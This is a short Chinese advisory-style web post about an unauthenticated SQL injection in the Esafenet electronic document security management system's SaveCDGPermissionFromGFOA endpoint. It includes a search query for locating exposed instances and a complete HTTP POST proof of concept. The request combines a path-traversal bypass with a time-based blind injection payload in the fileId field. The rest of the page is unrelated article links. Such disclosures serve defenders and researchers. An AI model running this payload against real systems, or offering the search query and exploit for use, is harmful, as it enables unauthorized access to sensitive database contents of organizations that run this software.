SQL注入漏洞

guozi • 2024年6月5日下午3:19 • 行业资讯

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

漏洞信息

漏洞复现

复现信息

语法：

app='亿赛通-电子文档安全管理系统'

测绘搜索

POC：

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1

漏洞复现

复现信息

复现-1

复现-2

更多内容

发现更多

原创文章，作者：guozi，如若转载，请注明出处：https://www.sudun.com/ask/90243.html

赞 (0)

0 0

要避免的 9 个 SQL 错误

上一篇 2024年6月5日

SqlSugar，就这个Feel 倍儿爽！

下一篇 2024年6月5日

科技网站设计公司

科技网站设计公司，听起来是不是很陌生？但是它却是当今互联网行业中备受关注的一个话题。那么什么是科技网站设计公司？它们到底提供怎样的服务内容？又有着怎样的特点和优势？如果你需要寻找一…

牛晓晓
行业资讯 2024年4月11日
00
国外php主机

你是否曾经听说过“国外php主机”这个词？它是什么？它有什么优势和特点？如果你对此一无所知，那么请继续阅读下去。在这篇文章中，我将为你揭开国外php主机的神秘面纱，并推荐几家知名的…

牛晓晓
行业资讯 2024年3月20日
00
SEO顾问：从业务分析到网站优化，他们的工作职责是什么？

SEO顾问是当今互联网行业中备受关注的职业，他们的工作职责涉及到从业务分析到网站优化的方方面面。那么，什么是SEO顾问？他们究竟负责哪些工作？如何选择一位合适的SEO顾问？下面，让…

牛晓晓
行业资讯 2024年4月7日
00
如何选择适合网站的云服务器？

近年来，随着互联网的快速发展，云服务器行业也迎来了蓬勃的发展。但是对于普通网站拥有者来说，如何选择适合自己网站的云服务器却是一个不容忽视的问题。究竟什么是云服务器？它又有哪些优势和…

牛晓晓
行业资讯 2024年3月24日
00

发表回复